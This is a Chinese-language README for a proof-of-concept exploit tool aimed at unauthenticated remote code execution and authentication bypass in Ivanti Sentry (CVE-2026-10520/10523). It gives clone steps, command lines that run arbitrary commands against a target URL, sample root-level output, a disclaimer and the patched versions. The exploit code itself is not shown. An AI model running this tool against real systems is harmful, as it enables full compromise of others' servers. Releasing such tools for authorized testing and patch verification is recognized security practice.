无需认证的远程代码执行 + 身份验证绕过
作者: Ashraf Zaryouh "0xBlackash"
影响 Ivanti Sentry(原 MobileIron Sentry)的两个严重漏洞:
这些漏洞允许未认证的攻击者完全攻陷系统。
python3 CVE-2026-10520.py --url <目标> --cmd <命令>
# 基本用法
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"
# 详细模式
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v
# 使用代理
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080
# 查看内核版本
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py
当目标存在漏洞时,你将看到:
██████╗ ██╗ ██╗██████╗ ██╗ █████╗ ██████╗██╗ ██╗ █████╗ ███████╗██╗ ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║ ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║ ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║ ███████║██║ █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║ ██╔══██║██║ ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║ ██║╚██████╗██║ ██╗██║ ██║███████║██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
CVE-2026-10520 & CVE-2026-10523 PoC 漏洞利用程序
Ivanti Sentry 无需认证 RCE + 身份验证绕过
作者:Ashraf Zaryouh "0xBlackash"
GitHub:https://github.com/0xBlackash
[+] 目标存在漏洞!
命令输出:
uid=0(root) gid=0(root) groups=0(root)
此工具仅供教育和授权安全测试使用。
未经授权使用于你未拥有的系统是违法行为。
作者对滥用行为不承担任何责任。
已在以下版本修复: 10.5.2 / 10.6.2 / 10.7.1
由 Ashraf Zaryouh "0xBlackash" 用心制作 ❤️
如果你觉得有用,请给这个仓库点个星! ⭐
| 参数 | 描述 | 必需 |
|---|
--url | 目标 URL(例如 https://target:8443) | 是 |
--cmd | 要执行的命令 | 是 |
-v, --verbose | 启用详细输出 | 否 |
--proxy | HTTP 代理(host:port) | 否 |